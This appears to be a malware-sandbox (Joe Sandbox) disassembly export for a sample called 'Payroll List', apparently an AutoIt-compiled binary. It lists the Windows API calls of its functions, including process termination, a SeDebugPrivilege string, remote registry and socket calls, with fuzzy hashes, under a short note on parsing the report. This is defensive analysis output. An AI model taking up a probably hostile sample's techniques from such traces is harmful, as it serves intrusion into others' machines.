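Feed it the full report text instead of SAMPLE to get one row per function; the "API String ID" and fuzzy-hash fields survive in `meta`, so rows can be joined against other reports of the same AutoIt runtime to separate interpreter boilerplate from the parts worth reading. Only the second stack slot of the two WinINet calls is decoded here; the other slots are left as the sandbox printed them, because a value such as 00000100 in a pointer position cannot be interpreted from the listing alone.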
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001BDC00), ref: 0017B715
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001BDC00), ref: 0017B749
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0017B8C1
                                                                    • SysFreeString.OLEAUT32(?), ref: 0017B8EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: 5ea70f1d8672b209e6d8c460d9764afa9622e8b3ebc83638a25092b57d3747da
                                                                    • Instruction ID: 6e3c4ca6de37ceae33b411ba2f6579ba4d1e3eaf07743b924a98276ad40d878d
                                                                    • Instruction Fuzzy Hash: 71F13E75A04219EFCF04DF94C888EAEB7B9FF49315F108499F919AB250DB31AE45CB90
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001824F5
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00182688
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001826AC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001826EC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0018270E
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0018286F
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 001828A1
                                                                    • CloseHandle.KERNEL32(?), ref: 001828D0
                                                                    • CloseHandle.KERNEL32(?), ref: 00182947
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 7a780c60c9ad847c47e6757dffcaa6fa1ac49baa6cd7b84d7ef91ace14d729ae
                                                                    • Instruction ID: 40c79ace25991841712f25793326904909f5aea5ba49ff010162da34b37485ce
                                                                    • Instruction Fuzzy Hash: 5ED1AC31604200DFCB15EF24D891A6EBBE5BF99310F14856DF88A9B2A2DB30DD45CF92
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0018B3F4
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: fd8cc3667757608b36dda86d9e0e4e326b5251b4c98c7437db435fe5f4cc9773
                                                                    • Instruction ID: a7ac2c7862eb477bc437e2cc2ea4867965491d9bfbf7cbfae0fe63b618ca636e
                                                                    • Instruction Fuzzy Hash: 3C519130608604BBEF24BF28DCCABAD3B65BB05314F644111FA16E66E2D771EA848F51
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0019DB1B
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0019DB3C
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0019DB51
                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0019DB6E
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0019DB95
                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0013A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0019DBA0
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0019DBBD
                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0013A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0019DBC8
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: f56db2b49fa37d241ac17cbaf54cce209f9829007e3a68472a40b8668c96bea8
                                                                    • Instruction ID: 1ed51b2472fa97ff5e53c1666eaedc7c3c8ab51671b3daae188c1452f44f2588
                                                                    • Instruction Fuzzy Hash: 6B518870600208EFDF24DF68DC82FAA77B9AF19750F110518F9869B6D0D7B1AD90CB50
                                                                    APIs
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00165FA6,?), ref: 00166ED8
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00165FA6,?), ref: 00166EF1
                                                                      • Part of subcall function 001672CB: GetFileAttributesW.KERNEL32(?,00166019), ref: 001672CC
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001675CA
                                                                    • _wcscmp.LIBCMT ref: 001675E2
                                                                    • MoveFileW.KERNEL32(?,?), ref: 001675FB
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 0c880dcf94c84277fd7cea93f1fdc70e3115f7e85bd1e57555ff19e858ffecdc
                                                                    • Instruction ID: 60bcc243faaca9aad7ad7039baebd2178a9211d36b4f31a1cb46908dba667c4d
                                                                    • Instruction Fuzzy Hash: 30514FB2A092199ADF55EB94DC81DDE73BC9F1C324B0040EAF605E3581EB7096D9CB60
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0013EAEB
                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0013EB32
                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0019DC86
                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019DAD1,00000004,00000000,00000000), ref: 0019DCF2
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 2cd33b223a02ccdadee5a5d75ca317490a8d1a75def08e7ef509551259246d92
                                                                    • Instruction ID: 396c995685e2b2aed087013e8b3420f6f0af045db2440d59992fc2d047dfb76e
                                                                    • Instruction Fuzzy Hash: 4D41B670605780AADB3E4B289D8DA6ABED6AB56314F1A080DE08B969E5C770BC80D711
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0015AEF1,00000B00,?,?), ref: 0015B26C
                                                                    • HeapAlloc.KERNEL32(00000000,?,0015AEF1,00000B00,?,?), ref: 0015B273
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0015AEF1,00000B00,?,?), ref: 0015B288
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0015AEF1,00000B00,?,?), ref: 0015B290
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0015AEF1,00000B00,?,?), ref: 0015B293
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0015AEF1,00000B00,?,?), ref: 0015B2A3
                                                                    • GetCurrentProcess.KERNEL32(0015AEF1,00000000,?,0015AEF1,00000B00,?,?), ref: 0015B2AB
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0015AEF1,00000B00,?,?), ref: 0015B2AE
                                                                    • CreateThread.KERNEL32(00000000,00000000,0015B2D4,00000000,00000000,00000000), ref: 0015B2C8
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: d31c3b72222b4ba5988f22417ae30503a50c5fd2598d9cfa1f04c03899601350
                                                                    • Instruction ID: b7c32318f9557c24e4d95d6a671fd182f0b850ec4265f10c09dc39b090448b1f
                                                                    • Instruction Fuzzy Hash: ED01C2B5240704BFEB10AFA5EC4DF5B7BACEB89711F014411FA05DB691CA749840CB71
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 7bc922a9598d1f9a927058ecc229104f99de59d7d1dfa4c96e8dd57c949eecdd
                                                                    • Instruction ID: 6cfb762ca689cccf08ad8bd596c4138f7fd6b10caefc1c8ad0fb4d043a7c6523
                                                                    • Instruction Fuzzy Hash: 96E1A171A00219AFDF14DFA8D881AEEB7B9EF58314F14812DF909AB281D770AD41CBD1
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2862541840-625585964
                                                                    • Opcode ID: a7f7557d6d837b1ebb35f92e47730049b8c906332fd9fb95a8f5c2c34894c231
                                                                    • Instruction ID: 77b11f908afa25094d6a1553f3597a9546d9313bf6bd33c86af56616e1708aab
                                                                    • Instruction Fuzzy Hash: 73919071A08219ABDF25CFA5C884FAEB7B8EF45714F10C55AF519AB280DB709944CFA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00189B19
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00189B2D
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00189B47
                                                                    • _wcscat.LIBCMT ref: 00189BA2
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00189BB9
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00189BE7
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 46bc38779924f83a19318bf6ba96ea8422b231168951f33242b7be57d4f2740b
                                                                    • Instruction ID: f191f426ab01d2c3ebf3f14fd4edfc604bdbdba77dd2f3b0870ba8e0a2f9844d
                                                                    • Instruction Fuzzy Hash: C141A071A00348ABDB21AFA4DC85FEE77A8EF08350F14446AF589A7291D7719E84CF60
                                                                    APIs
                                                                      • Part of subcall function 00166532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166554
                                                                      • Part of subcall function 00166532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166564
                                                                      • Part of subcall function 00166532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001665F9
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0018179A
                                                                    • GetLastError.KERNEL32 ref: 001817AD
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001817D9
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00181855
                                                                    • GetLastError.KERNEL32(00000000), ref: 00181860
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00181895
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: f0ec5d98d35921d88395157ff6ea703c72df9eec023aa2a6d81b17e1981aef6c
                                                                    • Instruction ID: 3ee6247d4abdb0ef8afb289d5cb3e81d1cab0e31fb667215a17e7ada5a06a73a
                                                                    • Opcode Fuzzy Hash: f0ec5d98d35921d88395157ff6ea703c72df9eec023aa2a6d81b17e1981aef6c
                                                                    • Instruction Fuzzy Hash: 7B419B72600200AFDB05FF64DCA6FADB7A5AF65310F058099F9069F282DB74AA45CF91
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 001658B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 48380dac8c1d3eadd025b274e7ff84e4d35960f1d67eedd93f5434076d78e943
                                                                    • Instruction ID: 34f031afe36f2c28088a347fef6158c0d4059cc836c2d90ecc12fead3d82af28
                                                                    • Opcode Fuzzy Hash: 48380dac8c1d3eadd025b274e7ff84e4d35960f1d67eedd93f5434076d78e943
                                                                    • Instruction Fuzzy Hash: 56112C3620DB42BFE7055B569C82DAE379DDF29324F20003BF611E7AC1E7B0EA504665
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0016A806
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: b8cb0ca869370131864e090d99fe5d69bf2f7093fb06a7bcb1c0234e87d34f36
                                                                    • Instruction ID: 98c620a37aa7b794922bf4d69d9406f692f0e9e510fddc2857f7e920e7f1f545
                                                                    • Opcode Fuzzy Hash: b8cb0ca869370131864e090d99fe5d69bf2f7093fb06a7bcb1c0234e87d34f36
                                                                    • Instruction Fuzzy Hash: 18C18B75A0421ADFDB04CF98D881BAEB7F4FF19315F20446AE606E7241D734AA91CF91
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00166B63
                                                                    • LoadStringW.USER32(00000000), ref: 00166B6A
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00166B80
                                                                    • LoadStringW.USER32(00000000), ref: 00166B87
                                                                    • _wprintf.LIBCMT ref: 00166BAD
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00166BCB
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00166BA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 60bee8a679bcfec8705d2a9575038ef8ca2cbf8034a2d3db6bd43a109c72e5a3
                                                                    • Instruction ID: 64225580df229682300125e8ec75494aec59fe17a5aa5ce6be4bf5df3dbc13fe
                                                                    • Opcode Fuzzy Hash: 60bee8a679bcfec8705d2a9575038ef8ca2cbf8034a2d3db6bd43a109c72e5a3
                                                                    • Instruction Fuzzy Hash: E90131F6900208BFEB11ABA4AD89EF7776CE709304F0044A5B746E2551EB749EC48F71
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00182BF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 2595220575-0
                                                                    • Opcode ID: 8de8e4c69df2d4c3e8af418501ce1f7064f2dd31a21075f1b95426ee0efcb88a
                                                                    • Instruction ID: a672f2634e400f3642dd907109649a685dcad72f9ef137f62dc648f0fa6b5c74
                                                                    • Opcode Fuzzy Hash: 8de8e4c69df2d4c3e8af418501ce1f7064f2dd31a21075f1b95426ee0efcb88a
                                                                    • Instruction Fuzzy Hash: 549167712042019FCB05EF54D891B6EBBE5FFA8310F04885DF996972A2DB34EA55CF82
                                                                    APIs
                                                                    • select.WSOCK32 ref: 00179691
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0017969E
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 001796C8
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001796E9
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 001796F8
                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 001797AA
                                                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,001BDC00), ref: 00179765
                                                                      • Part of subcall function 0015D2FF: _strlen.LIBCMT ref: 0015D309
                                                                    • _strlen.LIBCMT ref: 00179800
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                    • String ID:
                                                                    • API String ID: 3480843537-0
                                                                    • Opcode ID: fb31b558383e0ed285754760f643c566fdd4d9944b991492bccb1ba7e9ec1af4
                                                                    • Instruction ID: 6ae6f1b963e393e411df28e2a13b30e16959608b481542a431af85ac68385056
                                                                    • Opcode Fuzzy Hash: fb31b558383e0ed285754760f643c566fdd4d9944b991492bccb1ba7e9ec1af4
                                                                    • Instruction Fuzzy Hash: C381CF31504240ABC714EF64EC86E6FB7F9EFA9714F10861DF55A9B291EB30D908CB92
                                                                    APIs
                                                                    • __mtinitlocknum.LIBCMT ref: 0014A991
                                                                      • Part of subcall function 00147D7C: __FF_MSGBANNER.LIBCMT ref: 00147D91
                                                                      • Part of subcall function 00147D7C: __NMSG_WRITE.LIBCMT ref: 00147D98
                                                                      • Part of subcall function 00147D7C: __malloc_crt.LIBCMT ref: 00147DB8
                                                                    • __lock.LIBCMT ref: 0014A9A4
                                                                    • __lock.LIBCMT ref: 0014A9F0
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,001D6DE0,00000018,00155E7B,?,00000000,00000109), ref: 0014AA0C
                                                                    • EnterCriticalSection.KERNEL32(8000000C,001D6DE0,00000018,00155E7B,?,00000000,00000109), ref: 0014AA29
                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0014AA39
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1422805418-0
                                                                    • Opcode ID: 02dbde4483ad0c94b20aec24117f677f99f6e647b3fec1b962fd15ba46f874cc
                                                                    • Instruction ID: 3265e6188547073aeec1ac95fead8b983f0dbec192059f4243701c628fd7ff35
                                                                    • Opcode Fuzzy Hash: 02dbde4483ad0c94b20aec24117f677f99f6e647b3fec1b962fd15ba46f874cc
                                                                    • Instruction Fuzzy Hash: AB414E719406019BEB14DFA8D98475CB7B0BF15335F628319E425AB5F1D7B49C80CB82
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00188EE4
                                                                    • GetDC.USER32(00000000), ref: 00188EEC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00188EF7
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00188F03
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00188F3F
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00188F50
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0018BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00188F8A
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00188FAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: 7eb7876bea28b0bb8a2465babbb40ba87dce5a9663bc269cfed8ec6d270f0212
                                                                    • Instruction ID: 6c734c1955e3289e71c26eeb38cd41aa57b9b97a4f9601130553cbcbb8341f73
                                                                    • Opcode Fuzzy Hash: 7eb7876bea28b0bb8a2465babbb40ba87dce5a9663bc269cfed8ec6d270f0212
                                                                    • Instruction Fuzzy Hash: D4316B72200614BFEB109F60DC4AFEA3BA9EF4A715F044065FE099A591DBB59881CB70
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                    • _wcstok.LIBCMT ref: 0017184E
                                                                    • _wcscpy.LIBCMT ref: 001718DD
                                                                    • _memset.LIBCMT ref: 00171910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: 767c7a186afc4c868ae2fdead32e3bc690613b750918bb37fd8c73507c332390
                                                                    • Instruction ID: e28f1275d573425738b930dfbb02e76dd75dfcf755fc9d7cc438746cc71fdcc6
                                                                    • Opcode Fuzzy Hash: 767c7a186afc4c868ae2fdead32e3bc690613b750918bb37fd8c73507c332390
                                                                    • Instruction Fuzzy Hash: 23C19F316043509FC724EF28D891A6EB7F0BFA5350F00896DF999972A2DB30ED15CB82
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0019016D
                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0019038D
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001903AB
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 001903D6
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001903FF
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00190421
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00190440
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
